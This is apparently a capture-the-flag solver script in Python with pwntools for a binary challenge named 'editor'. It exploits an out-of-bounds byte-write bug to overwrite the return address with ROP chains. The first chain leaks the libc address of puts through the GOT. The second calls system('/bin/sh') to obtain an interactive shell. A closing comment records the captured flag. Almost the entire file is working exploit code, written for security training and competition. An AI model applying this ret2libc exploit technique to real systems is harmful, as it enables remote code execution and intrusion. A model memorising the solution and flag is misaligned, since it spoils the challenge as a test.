/
solver.py
131 lines (96 loc) · 2.83 KB
/
solver.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
from pwn import *
import sys
# r = process('./editor')
r = remote('editor.litctf.live', 1337)
libc = ELF('./libc-2.31.so')
puts = libc.sym['puts']
# gdb.attach(r, """
# b *0x40125E
# b *0x40133A
# b *0x4013AE
# """)
p = b'A' * 136
got = 0x403FC0
plt = 0x401040
main = 0x40125E
pop_rdi = 0x40140b #: pop rdi; ret;
r.recvuntil(b'gets):\n')
r.sendline(p)
r.recvuntil(b'do?\n')
r.sendline('1')
r.recvuntil(b'change!\n')
r.sendline(f'-32')
r.recvuntil(b'to!\n')
r.sendline(b'\x00')
p = (0x4343434343434343).to_bytes(8, byteorder='little')
p += (pop_rdi).to_bytes(3, byteorder='little').ljust(8, b'\x44')
p += (got).to_bytes(3, byteorder='little').ljust(8, b'\x44')
p += (plt).to_bytes(3, byteorder='little').ljust(8, b'\x44')
p += (main).to_bytes(3, byteorder='little').ljust(8, b'\x44')
l = 0
for i in range(144, 144 + len(p)):
r.recvuntil(b'do?\n')
r.sendline('1')
r.recvuntil(b'change!\n')
r.sendline(f'{i}')
r.recvuntil(b'to!\n')
r.sendline(p8(p[l]))
l += 1
ll = [155, 156, 157, 158, 159, 163, 164, 165, 166, 167, 171, 172, 173, 174, 175, 179, 180, 181, 182, 183][::-1]
for i in ll:
r.recvuntil(b'do?\n')
r.sendline('1')
r.recvuntil(b'change!\n')
r.sendline(f'{i}')
r.recvuntil(b'to!\n')
r.sendline(b'\x00')
r.sendline('1')
r.recvuntil(b'change!\n')
r.sendline('136')
r.recvuntil(b'to!\n')
r.sendline(b'\x00')
r.sendline('3')
p = b'F' * (136)
LIBC_BASE = int.from_bytes(r.recvuntil(b'gets):\n').split()[25], byteorder='little') - puts
# ADDR_BINSH = next(libc.search(b'/bin/sh')) + LIBC_BASE - 4 # local
ADDR_BINSH = next(libc.search(b'/bin/sh')) + LIBC_BASE
ADDR_SYSTEM = libc.symbols['system'] + LIBC_BASE
log.info(f'LIBC : {hex(LIBC_BASE)}')
log.info(f'BIN_SH : {hex(ADDR_BINSH)}')
log.info(f'SYSTEM : {hex(ADDR_SYSTEM)}')
r.sendline(p)
p = (0x4343434343434343).to_bytes(8, byteorder='little')
p += (pop_rdi+1).to_bytes(3, byteorder='little').ljust(8, b'\x44')
p += (pop_rdi).to_bytes(3, byteorder='little').ljust(8, b'\x44')
p += (ADDR_BINSH).to_bytes(6, byteorder='little').ljust(8, b'\x44')
p += (ADDR_SYSTEM).to_bytes(6, byteorder='little').ljust(8, b'\x44')
l = 0
for i in range(144, 144 + len(p)):
r.recvuntil(b'do?\n')
r.sendline('1')
r.recvuntil(b'change!\n')
r.sendline(f'{i}')
r.recvuntil(b'to!\n')
r.sendline(p8(p[l]))
l += 1
r.sendline('1')
r.recvuntil(b'change!\n')
r.sendline('136')
r.recvuntil(b'to!\n')
r.sendline(b'\x42')
ll = [155, 156, 157, 158, 159, 163, 164, 165, 166, 167, 174, 175, 182, 183][::-1]
for i in ll:
r.recvuntil(b'do?\n')
r.sendline('1')
r.recvuntil(b'change!\n')
r.sendline(f'{i}')
r.recvuntil(b'to!\n')
r.sendline(b'\x00')
r.sendline('1')
r.recvuntil(b'change!\n')
r.sendline('136')
r.recvuntil(b'to!\n')
r.sendline(b'\x00')
r.sendline('3')
r.interactive()
# flag{y3t_4n0th3r_b0r1ng_r3t2l1bc}